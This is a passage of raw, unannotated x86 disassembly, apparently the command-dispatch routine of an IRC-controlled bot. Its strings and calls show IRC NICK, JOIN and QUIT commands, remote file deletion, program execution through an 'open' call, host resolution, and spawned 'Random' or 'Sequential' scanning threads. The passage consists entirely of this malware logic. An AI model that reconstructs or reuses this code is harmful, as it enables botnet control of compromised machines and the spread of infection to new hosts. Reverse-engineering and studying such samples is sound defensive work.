cmp edi, ebx
jz short loc_411AA7
mov esi, [ebp+esi+var_7C]
cmp esi, ebx
jz short loc_411AA7
push esi
call sub_4159EF
pop ecx
push eax
push edi
call sub_4159EF
pop ecx
push eax
push [ebp+arg_10]
call sub_4159EF
pop ecx
push eax
push [ebp+arg_0]
call sub_4159EF
pop ecx
push eax
push [ebp+arg_18]
call sub_40702D
add esp, 14h
test eax, eax
jnz short loc_411A9D
push [ebp+arg_18]
push offset dword_42C118
jmp loc_40FCF6
; ---------------------------------------------------------------------------
loc_411A9D: ; CODE XREF: sub_40D2E0+47AE�j
push offset dword_42C0C8
jmp loc_411EC2
; ---------------------------------------------------------------------------
loc_411AA7: ; CODE XREF: sub_40D2E0+474F�j
; sub_40D2E0+475D�j ...
push offset dword_42C07C
jmp loc_411EC2
; ---------------------------------------------------------------------------
loc_411AB1: ; CODE XREF: sub_40D2E0+1CF0�j
; sub_40D2E0+1D07�j
push offset aR ; "r"
push edi
call sub_415B78
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_411B2C
mov ebx, 200h
push esi
lea eax, [ebp+var_2DC]
push ebx
push eax
call sub_41712C
add esp, 0Ch
loc_411ADA: ; CODE XREF: sub_40D2E0+4829�j
test eax, eax
jz short loc_411B0B
push 1
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40BAE7
push esi
lea eax, [ebp+var_2DC]
push ebx
push eax
call sub_41712C
add esp, 20h
jmp short loc_411ADA
; ---------------------------------------------------------------------------
loc_411B0B: ; CODE XREF: sub_40D2E0+47FC�j
push esi
call sub_415AD0
pop ecx
lea eax, [ebp+var_2DC]
push edi
push offset dword_42C048
push eax
call sub_415480
add esp, 0Ch
jmp loc_40F56B
; ---------------------------------------------------------------------------
loc_411B2C: ; CODE XREF: sub_40D2E0+47E2�j
push edi
push offset dword_42C018
jmp loc_40F51F
; ---------------------------------------------------------------------------
loc_411B37: ; CODE XREF: sub_40D2E0+1CC2�j
; sub_40D2E0+1CD9�j
cmp [ebp+var_C], ebx
jz loc_4133B5
push edi
push [ebp+var_C]
call sub_415A50
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_4133B5
push offset asc_425FD0 ; "\n"
push esi
call sub_415BA0
push esi
call sub_40999E
add esp, 0Ch
test eax, eax
jnz short loc_411B77
push offset dword_42BFDC
jmp loc_411EC2
; ---------------------------------------------------------------------------
loc_411B77: ; CODE XREF: sub_40D2E0+488B�j
push esi
push offset dword_42BFB4
jmp loc_412F22
; ---------------------------------------------------------------------------
loc_411B82: ; CODE XREF: sub_40D2E0+1C94�j
; sub_40D2E0+1CAB�j
cmp [ebp+var_C], ebx
jz loc_4133B5
push edi
push [ebp+var_C]
call sub_415A50
pop ecx
cmp eax, ebx
pop ecx
jz loc_4133B5
push eax
call sub_409140
test eax, eax
pop ecx
jnz short loc_411BB3
push offset unk_42BF88
jmp loc_411EC2
; ---------------------------------------------------------------------------
loc_411BB3: ; CODE XREF: sub_40D2E0+48C7�j
push offset dword_42BF5C
jmp loc_411EC2
; ---------------------------------------------------------------------------
loc_411BBD: ; CODE XREF: sub_40D2E0+1C66�j
; sub_40D2E0+1C7D�j
push 7Fh
lea eax, [ebp+var_6EC]
push edi
push eax
call sub_416D30
mov esi, [ebp+esi+var_8C]
add esp, 0Ch
cmp esi, ebx
jz short loc_411BEC
push 7Fh
lea eax, [ebp+var_66C]
push esi
push eax
call sub_416D30
add esp, 0Ch
loc_411BEC: ; CODE XREF: sub_40D2E0+48F8�j
push 7Fh
lea eax, [ebp+var_5EC]
push [ebp+var_8C]
push eax
call sub_416D30
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_6F0], eax
mov eax, [ebp+var_8]
mov [ebp+var_568], eax
mov eax, [ebp+var_4]
mov [ebp+var_564], eax
push edi
lea eax, [ebp+var_2DC]
push offset dword_42BF34
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push 15h
push eax
call sub_414F2C
add esp, 18h
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_6F0]
push ebx
push eax
push offset sub_40A291
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_411C8D
loc_411C77: ; CODE XREF: sub_40D2E0+49AB�j
cmp [ebp+var_560], ebx
jnz loc_412F31
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_411C77
; ---------------------------------------------------------------------------
loc_411C8D: ; CODE XREF: sub_40D2E0+4995�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset unk_42BEE8
jmp loc_412F22
; ---------------------------------------------------------------------------
loc_411C9E: ; CODE XREF: sub_40D2E0+1C38�j
; sub_40D2E0+1C4F�j
push ebx
push [ebp+var_8C]
push [ebp+arg_4]
push edi
call sub_4049CD
add esp, 10h
push edi
push offset dword_42BEC4
jmp loc_4133AE
; ---------------------------------------------------------------------------
loc_411CBC: ; CODE XREF: sub_40D2E0+1C0A�j
; sub_40D2E0+1C21�j
push 14h
lea eax, [ebp+var_708]
push ebx
push eax
call sub_415500
add esp, 0Ch
lea eax, [ebp+var_6F4]
push edi
push offset aS_2 ; "%s"
push eax
call sub_415480
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_710], eax
lea eax, [ebp+var_D8]
push eax
lea eax, [ebp+var_5F0]
push 80h
push eax
call sub_4159FA
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
lea eax, [ebp+var_5F0]
push eax
lea eax, [ebp+var_6F4]
push eax
lea eax, [ebp+var_2DC]
push offset dword_42BE90
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push 12h
push eax
call sub_414F2C
add esp, 1Ch
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_710]
push ebx
push eax
push offset sub_40AB26
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_411D95
loc_411D7F: ; CODE XREF: sub_40D2E0+4AB3�j
cmp [ebp+var_560], ebx
jnz loc_41327F
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_411D7F
; ---------------------------------------------------------------------------
loc_411D95: ; CODE XREF: sub_40D2E0+4A9D�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset dword_42E36C
jmp loc_413270
; ---------------------------------------------------------------------------
loc_411DA6: ; CODE XREF: sub_40D2E0+1BDC�j
; sub_40D2E0+1BF3�j
push edi
call ds:dword_42213C ; DeleteFileA
test eax, eax
jz short loc_411DD0
push edi
push offset dword_42BE64
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_4159FA
add esp, 10h
jmp loc_40F54A
; ---------------------------------------------------------------------------
loc_411DD0: ; CODE XREF: sub_40D2E0+4ACF�j
push offset dword_42C814
call sub_40907B
pop ecx
push eax
jmp loc_4129D2
; ---------------------------------------------------------------------------
loc_411DE1: ; CODE XREF: sub_40D2E0+1BAE�j
; sub_40D2E0+1BC5�j
push edi
call sub_4159EF
push eax
call sub_413887
pop ecx
pop ecx
push 1
pop esi
cmp eax, esi
push edi
jnz short loc_411DFE
push offset unk_42BE2C
jmp short loc_411E03
; ---------------------------------------------------------------------------
loc_411DFE: ; CODE XREF: sub_40D2E0+4B15�j
push offset unk_42BDE8
loc_411E03: ; CODE XREF: sub_40D2E0+4B1C�j
lea eax, [ebp+var_2DC]
push eax
call sub_415480
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz loc_40F56E
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40BAE7
add esp, 14h
jmp loc_40F56E
; ---------------------------------------------------------------------------
loc_411E3C: ; CODE XREF: sub_40D2E0+1B80�j
; sub_40D2E0+1B97�j
push ebx
push ebx
push edi
push [ebp+var_4]
push ebx
push [ebp+arg_4]
call sub_4135F8
add esp, 18h
cmp eax, 1
push edi
jnz short loc_411E5E
push offset unk_42BDB4
jmp loc_40F51F
; ---------------------------------------------------------------------------
loc_411E5E: ; CODE XREF: sub_40D2E0+4B72�j
push offset unk_42BD74
jmp loc_40F51F
; ---------------------------------------------------------------------------
loc_411E68: ; CODE XREF: sub_40D2E0+1B52�j
; sub_40D2E0+1B69�j
push edi
call ds:dword_4364A8 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_411EA2
push 2
lea eax, [ebp+arg_0]
push 4
push eax
call ds:dword_436420 ; gethostbyaddr
cmp eax, ebx
jz short loc_411EBD
push dword ptr [eax]
loc_411E8B: ; CODE XREF: sub_40D2E0+4BDB�j
push edi
lea eax, [ebp+var_2DC]
push offset dword_42BD48
push eax
call sub_415480
add esp, 10h
jmp short loc_411ED0
; ---------------------------------------------------------------------------
loc_411EA2: ; CODE XREF: sub_40D2E0+4B95�j
push edi
call ds:dword_4364EC ; gethostbyname
cmp eax, ebx
jz short loc_411EBD
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call ds:dword_4364F4 ; inet_ntoa
push eax
jmp short loc_411E8B
; ---------------------------------------------------------------------------
loc_411EBD: ; CODE XREF: sub_40D2E0+4BA7�j
; sub_40D2E0+4BCB�j
push offset dword_42BD10
loc_411EC2: ; CODE XREF: sub_40D2E0+3E2D�j
; sub_40D2E0+3FBC�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_415480
pop ecx
pop ecx
loc_411ED0: ; CODE XREF: sub_40D2E0+2A25�j
; sub_40D2E0+3B35�j ...
cmp [ebp+var_8], ebx
jnz loc_412F31
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40BAE7
add esp, 14h
jmp loc_412F31
; ---------------------------------------------------------------------------
loc_411EFA: ; CODE XREF: sub_40D2E0+1B24�j
; sub_40D2E0+1B3B�j
push 7Fh
push edi
push [ebp+arg_14]
call sub_416D30
add esp, 0Ch
push edi
push offset dword_42BCDC
jmp loc_40F2B6
; ---------------------------------------------------------------------------
loc_411F13: ; CODE XREF: sub_40D2E0+1AF6�j
; sub_40D2E0+1B0D�j
push 5
push ebx
push ebx
push edi
push offset aOpen ; "open"
push ebx
call ds:dword_4363DC
test eax, eax
push edi
jz short loc_411F33
push offset unk_42BCA0
jmp loc_40F51F
; ---------------------------------------------------------------------------
loc_411F33: ; CODE XREF: sub_40D2E0+4C47�j
push offset unk_42BC5C
jmp loc_40F51F
; ---------------------------------------------------------------------------
loc_411F3D: ; CODE XREF: sub_40D2E0+1AC8�j
; sub_40D2E0+1ADF�j
mov al, [edi]
mov ds:byte_42ACDC, al
movsx eax, byte ptr [edi]
push eax
push offset dword_42BC28
jmp loc_40F2B6
; ---------------------------------------------------------------------------
loc_411F52: ; CODE XREF: sub_40D2E0+1A9A�j
; sub_40D2E0+1AB1�j
push edi
call sub_4159EF
test eax, eax
pop ecx
jle loc_4133B5
push edi
call sub_4159EF
cmp eax, 400h
pop ecx
jge loc_4133B5
push ebx
push ebx
lea eax, [ebp+var_B8]
push 2
push eax
call sub_41416F
add esp, 10h
push eax
lea eax, [ebp+var_2DC]
push offset dword_42C578
push eax
call sub_415480
add esp, 0Ch
jmp loc_41143E
; ---------------------------------------------------------------------------
loc_411FA0: ; CODE XREF: sub_40D2E0+1A6C�j
; sub_40D2E0+1A83�j
push edi
call sub_4159EF
test eax, eax
pop ecx
jle loc_40D6A7
push edi
call sub_4159EF
cmp eax, 400h
pop ecx
jge loc_40D6A7
push offset aQuitLater ; "QUIT :later\r\n"
push edi
call sub_4159EF
imul eax, 234h
pop ecx
push ds:dword_43BECC[eax]
call sub_40BAA1
pop ecx
pop ecx
push 1F4h
call ds:dword_422054 ; Sleep
push edi
call sub_4159EF
imul eax, 234h
pop ecx
push ds:dword_43BECC[eax]
call ds:dword_436500 ; closesocket
push [ebp+var_10]
push edi
call sub_4159EF
imul eax, 234h
pop ecx
push ds:dword_43BED4[eax]
call ds:dword_422150 ; TerminateThread
push edi
call sub_4159EF
imul eax, 234h
push edi
mov ds:dword_43BED4[eax], ebx
call sub_4159EF
imul eax, 234h
pop ecx
pop ecx
mov byte ptr ds:dword_43BCC0[eax], bl
jmp loc_40D6A7
; ---------------------------------------------------------------------------
loc_41204B: ; CODE XREF: sub_40D2E0+1A3E�j
; sub_40D2E0+1A55�j
push edi
push offset aAll ; "all"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_412089
call sub_4150F5
cmp eax, ebx
jle short loc_41207F
push eax
push offset dword_42BBDC
loc_41206B: ; CODE XREF: sub_40D2E0+15E2�j
; sub_40D2E0+2A8F�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_415480
loc_412077: ; CODE XREF: sub_40D2E0+3CA4�j
add esp, 0Ch
jmp loc_412A7A
; ---------------------------------------------------------------------------
loc_41207F: ; CODE XREF: sub_40D2E0+4D83�j
push offset dword_42BBA4
jmp loc_412A6C
; ---------------------------------------------------------------------------
loc_412089: ; CODE XREF: sub_40D2E0+4D7A�j
mov eax, [ebp+var_C0]
lea edi, [eax+1]
cmp edi, 20h
jnb loc_40D6A7
lea eax, [ebp+edi*4+var_94]
mov [ebp+arg_24], eax
loc_4120A5: ; CODE XREF: sub_40D2E0+4E36�j
mov eax, [ebp+arg_24]
mov esi, [eax]
cmp esi, ebx
jz loc_40D6A7
push esi
call sub_4159EF
push eax
call sub_415067
pop ecx
pop ecx
test eax, eax
push esi
jz short loc_4120CC
push offset dword_42BB70
jmp short loc_4120D1
; ---------------------------------------------------------------------------
loc_4120CC: ; CODE XREF: sub_40D2E0+4DE3�j
push offset dword_42BB34
loc_4120D1: ; CODE XREF: sub_40D2E0+4DEA�j
lea eax, [ebp+var_2DC]
push eax
call sub_415480
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_412101
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40BAE7
add esp, 14h
loc_412101: ; CODE XREF: sub_40D2E0+4E03�j
lea eax, [ebp+var_2DC]
push eax
call sub_40A5B3
add [ebp+arg_24], 4
inc edi
cmp edi, 20h
pop ecx
jb short loc_4120A5
jmp loc_40D6A7
; ---------------------------------------------------------------------------
loc_41211D: ; CODE XREF: sub_40D2E0+1A10�j
; sub_40D2E0+1A27�j
cmp [ebp+var_C], ebx
jz loc_4133B5
push edi
push [ebp+var_C]
call sub_415A50
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_4133B5
push esi
push offset dword_42C58C
push [ebp+arg_4]
call sub_40BAA1
add esp, 0Ch
push esi
push offset dword_42BB0C
jmp loc_4133AE
; ---------------------------------------------------------------------------
loc_412157: ; CODE XREF: sub_40D2E0+19E2�j
; sub_40D2E0+19F9�j
push edi
push offset dword_42C4A8
push [ebp+arg_4]
call sub_40BAA1
add esp, 0Ch
push edi
push offset dword_42BADC
jmp loc_4133AE
; ---------------------------------------------------------------------------
loc_412173: ; CODE XREF: sub_40D2E0+19B4�j
; sub_40D2E0+19CB�j
push [ebp+esi+var_8C]
push edi
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_40BAA1
add esp, 10h
push edi
push offset dword_42BAAC
jmp loc_4133AE
; ---------------------------------------------------------------------------
loc_412196: ; CODE XREF: sub_40D2E0+1986�j
; sub_40D2E0+199D�j
push edi
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_40BAA1
add esp, 0Ch
push edi
push offset dword_42BA78
jmp loc_4133AE
; ---------------------------------------------------------------------------
loc_4121B2: ; CODE XREF: sub_40D2E0+194B�j
; sub_40D2E0+1960�j
mov al, ds:byte_42AD0A
mov [ebp+arg_0], ebx
cmp al, bl
mov edx, offset byte_42AD0A
jz loc_40D6A7
mov ecx, edx
loc_4121C9: ; CODE XREF: sub_40D2E0+4EF1�j
inc [ebp+arg_0]
add ecx, 0Bh
cmp [ecx], bl
jnz short loc_4121C9
cmp al, bl
jz loc_40D6A7
mov [ebp+arg_18], edx
loc_4121DE: ; CODE XREF: sub_40D2E0+51BC�j
push 8
call sub_415174
pop ecx
mov ecx, eax
mov eax, 190h
cdq
idiv [ebp+arg_0]
add eax, ecx
cmp eax, 3E8h
jle short loc_41222D
push ecx
lea eax, [ebp+var_2DC]
push offset unk_42CDC4
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40BAE7
add esp, 20h
jmp loc_412493
; ---------------------------------------------------------------------------
loc_41222D: ; CODE XREF: sub_40D2E0+4F18�j
or [ebp+var_314], 0FFFFFFFFh
cmp ds:dword_426620, ebx
mov [ebp+var_318], 64h
mov [ebp+var_32C], 7
mov [ebp+var_328], 270Fh
mov [ebp+arg_0], ebx
jz short loc_41229E
mov eax, [ebp+arg_18]
mov edi, offset dword_426620
lea esi, [eax-0Ah]
loc_412268: ; CODE XREF: sub_40D2E0+4FA0�j
lea eax, [edi-28h]
push esi
push eax
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz short loc_412284
inc [ebp+arg_0]
add edi, 3Ch
cmp [edi], ebx
jnz short loc_412268
jmp short loc_41229E
; ---------------------------------------------------------------------------
loc_412284: ; CODE XREF: sub_40D2E0+4F96�j
mov eax, [ebp+arg_0]
mov ecx, eax
mov [ebp+var_314], eax
imul ecx, 3Ch
mov ecx, ds:dword_426620[ecx]
mov [ebp+var_330], ecx
loc_41229E: ; CODE XREF: sub_40D2E0+4F7B�j
; sub_40D2E0+4FA2�j
cmp [ebp+var_330], ebx
jz loc_4124A7
push 10h
lea eax, [ebp+arg_10]
pop esi
push eax
lea eax, [ebp+var_2EC]
push eax
mov [ebp+arg_10], esi
push [ebp+arg_4]
call ds:dword_43640C ; getsockname
mov al, [ebp+var_9C7]
push esi
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp+var_2E8], eax
push [ebp+var_2E8]
call ds:dword_4364F4 ; inet_ntoa
push eax
lea eax, [ebp+var_444]
push eax
call sub_416D30
xor eax, eax
cmp [ebp+var_9C7], bl
push 30h
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+var_444]
push eax
call sub_417030
add esp, 14h
cmp edi, ebx
mov byte ptr [ebp+arg_24+3], bl
jle short loc_412340
loc_41231E: ; CODE XREF: sub_40D2E0+505E�j
cmp eax, ebx
jz short loc_412340
mov byte ptr [eax], 78h
lea eax, [ebp+var_444]
push 30h
push eax
call sub_417030
inc byte ptr [ebp+arg_24+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_24+3]
cmp ecx, edi
jl short loc_41231E
loc_412340: ; CODE XREF: sub_40D2E0+503C�j
; sub_40D2E0+5040�j
mov eax, [ebp+arg_4]
push [ebp+var_8C]
mov esi, [ebp+var_4]
mov [ebp+var_334], eax
mov eax, [ebp+var_8]
push 80h
mov [ebp+var_308], eax
lea eax, [ebp+var_434]
push eax
mov [ebp+var_304], 1
mov [ebp+var_30C], esi
call sub_4159FA
mov edi, offset aF_0 ; "#f"
push offset byte_4325D8
push edi
call sub_4158A0
add esp, 14h
test eax, eax
jz short loc_4123AA
push edi
lea eax, [ebp+var_3B4]
push 80h
push eax
call sub_4159FA
add esp, 0Ch
jmp short loc_4123B0
; ---------------------------------------------------------------------------
loc_4123AA: ; CODE XREF: sub_40D2E0+50B1�j
mov [ebp+var_3B4], bl
loc_4123B0: ; CODE XREF: sub_40D2E0+50C8�j
cmp [ebp+var_304], ebx
mov eax, offset aRandom_0 ; "Random"
jnz short loc_4123C2
mov eax, offset aSequential ; "Sequential"
loc_4123C2: ; CODE XREF: sub_40D2E0+50DB�j
push [ebp+var_318]
lea ecx, [ebp+var_444]
push [ebp+var_328]
push [ebp+var_32C]
push [ebp+var_330]
push ecx
push eax
lea eax, [ebp+var_2DC]
push offset unk_42BA00
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push 8
push eax
call sub_414F2C
add esp, 2Ch
mov [ebp+var_324], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_444]
push ebx
push eax
push offset sub_405FC5
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_324]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_41244C
loc_41243A: ; CODE XREF: sub_40D2E0+516A�j
cmp [ebp+var_300], ebx
jnz short loc_412467
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_41243A
; ---------------------------------------------------------------------------
loc_41244C: ; CODE XREF: sub_40D2E0+5158�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2DC]
push offset unk_42CCB4
push eax
call sub_415480
add esp, 0Ch
loc_412467: ; CODE XREF: sub_40D2E0+5160�j
cmp [ebp+var_8], ebx
jnz short loc_412486
push ebx
lea eax, [ebp+var_2DC]
push esi
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40BAE7
add esp, 14h
loc_412486: ; CODE XREF: sub_40D2E0+518A�j
lea eax, [ebp+var_2DC]
push eax
call sub_40A5B3
pop ecx
loc_412493: ; CODE XREF: sub_40D2E0+4F48�j
add [ebp+arg_18], 0Bh
mov eax, [ebp+arg_18]
cmp [eax], bl
jnz loc_4121DE
jmp loc_40D6A7
; ---------------------------------------------------------------------------
loc_4124A7: ; CODE XREF: sub_40D2E0+3108�j
; sub_40D2E0+4FC4�j
push offset unk_42B9BC
jmp loc_412A6C
; ---------------------------------------------------------------------------
loc_4124B1: ; CODE XREF: sub_40D2E0+1921�j
; sub_40D2E0+1936�j
push [ebp+var_8C]
lea eax, [ebp+var_A4]
push 80h
push eax
call sub_4159FA
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_A8], eax
mov eax, [ebp+var_4]
mov [ebp+var_20], eax
mov eax, [ebp+var_8]
mov [ebp+var_1C], eax
push offset unk_42B984
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_4159FA
push ebx
lea eax, [ebp+var_2DC]
push 1Eh
push eax
call sub_414F2C
add esp, 18h
mov [ebp+var_24], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_A8]
push ebx
push eax
push offset sub_40767D
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_24]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_41254A
loc_412537: ; CODE XREF: sub_40D2E0+5268�j
cmp [ebp+var_18], ebx
jnz loc_41327F
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_412537
; ---------------------------------------------------------------------------
loc_41254A: ; CODE XREF: sub_40D2E0+5255�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset unk_42B938
jmp loc_413270
; ---------------------------------------------------------------------------
loc_41255B: ; CODE XREF: sub_40D2E0+18F7�j
; sub_40D2E0+190C�j
push 4
call sub_415174
test eax, eax
pop ecx
jle short loc_412571
push offset unk_42B90C
jmp loc_40F1A6
; ---------------------------------------------------------------------------
loc_412571: ; CODE XREF: sub_40D2E0+5285�j
mov eax, [ebp+esi+var_90]
cmp eax, ebx
jz short loc_412594
push eax
mov edi, 104h
lea eax, [ebp+var_7FC]
push edi
push eax
call sub_4159FA
add esp, 0Ch
jmp short loc_4125A8
; ---------------------------------------------------------------------------
loc_412594: ; CODE XREF: sub_40D2E0+529A�j
mov edi, 104h
lea eax, [ebp+var_7FC]
push edi
push eax
push ebx
call ds:off_422060
loc_4125A8: ; CODE XREF: sub_40D2E0+52B2�j
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jnz short loc_4125B8
mov esi, offset byte_42AD8C
loc_4125B8: ; CODE XREF: sub_40D2E0+52D1�j
push esi
lea eax, [ebp+var_6F8]
push edi
push eax
call sub_4159FA
mov eax, ds:dword_42ACC4
push 7Fh
push [ebp+var_8C]
mov [ebp+var_5EC], eax
mov eax, [ebp+arg_4]
mov [ebp+var_5F0], ebx
mov [ebp+var_800], eax
lea eax, [ebp+var_5E8]
push eax
call sub_416D30
mov eax, [ebp+var_4]
add esp, 18h
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
lea eax, [ebp+var_6F8]
push eax
lea eax, [ebp+var_7FC]
push eax
lea eax, [ebp+var_2DC]
push [ebp+var_5EC]
push offset unk_426A40
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push 4
push eax
call sub_414F2C
add esp, 20h
mov [ebp+var_5F4], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_800]
push ebx
push eax
push offset sub_40525F
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_5F4]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_41268B
loc_412675: ; CODE XREF: sub_40D2E0+53A9�j
cmp [ebp+var_560], ebx
jnz loc_40F2C5
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_412675
; ---------------------------------------------------------------------------
loc_41268B: ; CODE XREF: sub_40D2E0+5393�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset unk_42B8C4
jmp loc_40F2B6
; ---------------------------------------------------------------------------
loc_41269C: ; CODE XREF: sub_40D2E0+18CD�j
; sub_40D2E0+18E2�j
mov edi, [ebp+esi+var_90]
cmp edi, ebx
jz short loc_4126BB
push edi
call sub_4159EF
test eax, eax
pop ecx
jz short loc_4126BB
push edi
call sub_4159EF
pop ecx
jmp short loc_4126C0
; ---------------------------------------------------------------------------
loc_4126BB: ; CODE XREF: sub_40D2E0+53C5�j
; sub_40D2E0+53D0�j
mov eax, ds:dword_42ACC8
loc_4126C0: ; CODE XREF: sub_40D2E0+53D9�j
mov esi, [ebp+esi+var_8C]
mov [ebp+var_57C], eax
xor eax, eax
cmp [ebp+var_9C4], bl
setz al
cmp esi, ebx
mov [ebp+var_568], eax
jz short loc_4126F3
lea eax, [ebp+var_680]
push esi
push eax
call sub_415480
pop ecx
pop ecx
jmp short loc_41271E
; ---------------------------------------------------------------------------
loc_4126F3: ; CODE XREF: sub_40D2E0+5400�j
lea eax, [ebp+var_3FC]
push 104h
push eax
call ds:dword_422058 ; GetSystemDirectoryA
push ebx
push ebx
lea eax, [ebp+var_2E8]
push ebx
push eax
lea eax, [ebp+var_3FC]
push eax
call sub_4173D8
add esp, 14h
loc_41271E: ; CODE XREF: sub_40D2E0+5411�j
lea eax, [ebp+var_680]
push eax
call sub_415C80
cmp [ebp+eax+var_681], 5Ch
pop ecx
jnz short loc_412749
lea eax, [ebp+var_680]
push eax
call sub_415C80
pop ecx
mov [ebp+eax+var_681], bl
loc_412749: ; CODE XREF: sub_40D2E0+5453�j
push [ebp+var_8C]
mov esi, [ebp+arg_4]
lea eax, [ebp+var_908]
mov [ebp+var_90C], esi
push 80h
push eax
call sub_4159FA
mov eax, [ebp+var_8]
mov edi, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_56C], eax
lea eax, [ebp+var_680]
mov [ebp+var_570], edi
push eax
push [ebp+var_57C]
push esi
call sub_409526
pop ecx
push eax
lea eax, [ebp+var_2DC]
push offset unk_426924
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push 3
push eax
call sub_414F2C
add esp, 20h
mov [ebp+var_574], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_90C]
push ebx
push eax
push offset sub_404138
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_574]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_412801
loc_4127EB: ; CODE XREF: sub_40D2E0+551F�j
cmp [ebp+var_560], ebx
jnz loc_412953
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_4127EB
; ---------------------------------------------------------------------------
loc_412801: ; CODE XREF: sub_40D2E0+5509�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset unk_42B87C
jmp loc_412944
; ---------------------------------------------------------------------------
loc_412812: ; CODE XREF: sub_40D2E0+18A3�j
; sub_40D2E0+18B8�j
mov edi, [ebp+esi+var_90]
cmp edi, ebx
jz short loc_412831
push edi
call sub_4159EF
test eax, eax
pop ecx
jz short loc_412831
push edi
call sub_4159EF
pop ecx
jmp short loc_412836
; ---------------------------------------------------------------------------
loc_412831: ; CODE XREF: sub_40D2E0+553B�j
; sub_40D2E0+5546�j
mov eax, ds:dword_42ACCC
loc_412836: ; CODE XREF: sub_40D2E0+554F�j
mov [ebp+var_578], eax
mov eax, [ebp+esi+var_8C]
cmp eax, ebx
jnz short loc_41284D
lea eax, [ebp+var_D8]
loc_41284D: ; CODE XREF: sub_40D2E0+5565�j
push eax
lea eax, [ebp+var_6B8]
push 40h
push eax
call sub_4159FA
mov esi, [ebp+esi+var_88]
add esp, 0Ch
cmp esi, ebx
jnz short loc_41286F
mov esi, offset byte_4325D8
loc_41286F: ; CODE XREF: sub_40D2E0+5588�j
push esi
lea eax, [ebp+var_678]
push 100h
push eax
call sub_4159FA
add esp, 0Ch
lea eax, [ebp+var_738]
push [ebp+var_8C]
push 80h
push eax
call sub_4159FA
mov eax, [ebp+var_8]
mov esi, [ebp+arg_4]
mov edi, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_564], eax
lea eax, [ebp+var_6B8]
push eax
mov [ebp+var_73C], esi
push [ebp+var_578]
mov [ebp+var_568], edi
push esi
